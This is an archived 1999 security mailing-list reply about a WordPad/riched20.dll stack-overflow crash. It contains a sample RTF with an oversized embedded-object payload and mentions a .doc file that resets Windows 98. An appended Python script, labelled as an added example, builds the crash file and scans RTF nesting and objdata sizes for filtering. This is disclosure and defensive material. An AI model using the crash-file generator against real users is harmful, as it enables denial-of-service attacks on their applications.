Re: WordPad/riched20.dll buffer overflow

From: Ussr Labs (labsat_private)
Date: Tue Nov 23 1999 - 17:06:45 PST

    Well, I found SOME ways to CRASH (no exploit possible) in another place in
    the RTF format, in riched20.dll, making an EATER OF STACK inside the RTF
    file.
    
    One RTF inside another with OLE: the OLE (WordPad) crashes with a STACK
    OVERFLOW EXCEPTION FILTER.
    
    EXAMPLE RTF CODE:
    
    {\rtf1\ansi\ansicpg1252\deff0\deftab720{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}{\f2\froman Times New Roman;}{\f3\froman Times New Roman;}}
    {\colortbl\red0\green0\blue0;}
    \deflang1033\horzdoc{\*\fchars }{\*\lchars }\pard\plain\f2\fs20 hello!!!!{\object\objemb{\*\objclass WordPad.Document.1}{\*\objname Object1}\objw11115\objh293{\*\objdata BUFFER)
    }}}\plain\f2\fs20 !!!!!!!!!!!!!!!!
    \par }
    
    WHERE BUFFER IS LIKE 9K OF (123456789ABCDEFGHIJKLMNOPQRSTUVWYZ)
    
    
    
    But it just eats the stack, OLE crashes, and it is not possible to make an
    exploit out of this.
    
    This is another example of another bug in OLE/riched20.dll, all in wordpad.exe.
    
    
    Ussrlabs
    
    I have another example where the same happens with Word files. Personally I
    made a .doc file which, if you run it, resets the machine in Microsoft Word
    2000 and 97 on Windows 98, and on NT crashes and leaves Word in memory
    (present) like a memory process leak. But it is just a bug, no way to exploit
    it; the only thing possible is to reset the machine on Windows 98 :).
    
    
    
    u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
    http://www.ussrback.com
    
    
    >My assertion was based on a cursory look and the fact that the return address
    >_is_ overwritten. I'll bow to the greater and more in-depth analysis of
    >USSRLABS and Solar Eclipse. No doubt, however, there will be buffer overruns
    >elsewhere within the application and not just after the {rtf1\AA...} part.
    >I've not actually looked, but if you do I can almost guarantee there will be
    >more. Perhaps one of these will _not_ be restricted to A-Z and a-z, and then
    >it would have a chance of being exploitable. For example, there is an
    >{operator Name-Goes-Here} part of a Windows RTF file. Doing
    >{operatorAAA.... Name} or {operator AAAA...} may cause a buffer overrun,
    >and one where the return address is overwritten and any characters are
    >allowed. This is mostly conjecture, however. Anyone with the time or
    >inclination could check on this or any of the other RTF headers.
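The following is an added example and is not code from the post above or from USSR Labs. It is a Python script that generates the test document the post describes (same prologue, same WordPad.Document.1 embedded object, and a \objdata payload made of the repeating pattern quoted, 9 KB by default) with an optional nesting depth for the "one RTF inside another" case, plus a small scanner that reports group depth, brace balance and the size of each \objdata payload, the numbers a parser-hardening test or a mail-gateway content filter would key on. The nesting layout used for depth > 1, the default sizes, the output file name and the function names are assumptions of this example; the post's sample as transcribed has one more closing brace than opening braces, and the generator emits a balanced file instead.

```python
"""Build the WordPad/riched20.dll stack-eater RTF described in the post and scan it.

Added example, not the original poster's code. The prologue, object class and
the repeating payload pattern are taken from the post; the nesting layout for
depth > 1, the default sizes and the file name are assumptions.
"""

# Repeating unit quoted in the post ("123456789ABCDEFGHIJKLMNOPQRSTUVWYZ").
PATTERN = "123456789ABCDEFGHIJKLMNOPQRSTUVWYZ"

# Document prologue from the post's sample, reflowed onto one line per group.
HEADER = (
    r"{\rtf1\ansi\ansicpg1252\deff0\deftab720"
    r"{\fonttbl{\f0\fswiss MS Sans Serif;}{\f1\froman\fcharset2 Symbol;}"
    r"{\f2\froman Times New Roman;}{\f3\froman Times New Roman;}}" "\r\n"
    r"{\colortbl\red0\green0\blue0;}" "\r\n"
    r"\deflang1033\horzdoc{\*\fchars }{\*\lchars }\pard\plain\f2\fs20 hello!!!!"
)
TRAILER = r"\plain\f2\fs20 !!!!!!!!!!!!!!!!" "\r\n" r"\par }" "\r\n"

OBJDATA = r"\*\objdata"


def make_payload(size):
    r"""Return `size` characters of the post's pattern (it contains no braces or backslashes)."""
    reps = -(-size // len(PATTERN))          # ceiling division
    return (PATTERN * reps)[:size]


def embedded_object(payload, depth):
    r"""One {\object\objemb ...} group as in the post. For depth > 1 the \objdata
    group holds another such object; this nesting layout is an assumption."""
    inner = payload if depth <= 1 else embedded_object(payload, depth - 1)
    return (r"{\object\objemb{\*\objclass WordPad.Document.1}{\*\objname Object1}"
            r"\objw11115\objh293{" + OBJDATA + " " + inner + "}}")


def build_rtf(payload_size=9 * 1024, depth=1):
    """Assemble the whole test document; depth=1 reproduces the post's layout."""
    return HEADER + embedded_object(make_payload(payload_size), depth) + TRAILER


def scan(rtf):
    r"""Walk the RTF group structure, honouring the \{ \} \\ escapes, and report
    the maximum nesting depth, whether braces balance, and the size of every
    \*\objdata payload in closing order (innermost first)."""
    depth = max_depth = 0
    pending = []            # (group depth, payload start index) of open \objdata groups
    sizes = []
    i, n = 0, len(rtf)
    while i < n:
        c = rtf[i]
        if c == "\\":
            # \{ \} \\ are literal characters, not group delimiters: skip both
            i += 2 if i + 1 < n and rtf[i + 1] in "{}\\" else 1
            continue
        if c == "{":
            depth += 1
            max_depth = max(max_depth, depth)
            if rtf.startswith(OBJDATA, i + 1):
                pending.append((depth, i + 1 + len(OBJDATA)))
        elif c == "}":
            if pending and pending[-1][0] == depth:
                _, start = pending.pop()
                sizes.append(len(rtf[start:i].strip()))
            depth -= 1
        i += 1
    return {"max_depth": max_depth, "balanced": depth == 0, "objdata_sizes": sizes}


if __name__ == "__main__":
    doc = build_rtf()
    # WordPad of that era reads ANSI text; write bytes 1:1 and keep the CRLFs.
    with open("stackeater.rtf", "w", encoding="latin-1", newline="") as f:
        f.write(doc)
    print(scan(doc))
```

Running the script writes stackeater.rtf for opening in WordPad on an affected build; `build_rtf(depth=2)` or larger produces the nested variant, and `scan()` over any incoming RTF gives the two values a filter would threshold on, group depth and \objdata size, before the file ever reaches riched20.dll.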
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:14:02 PDT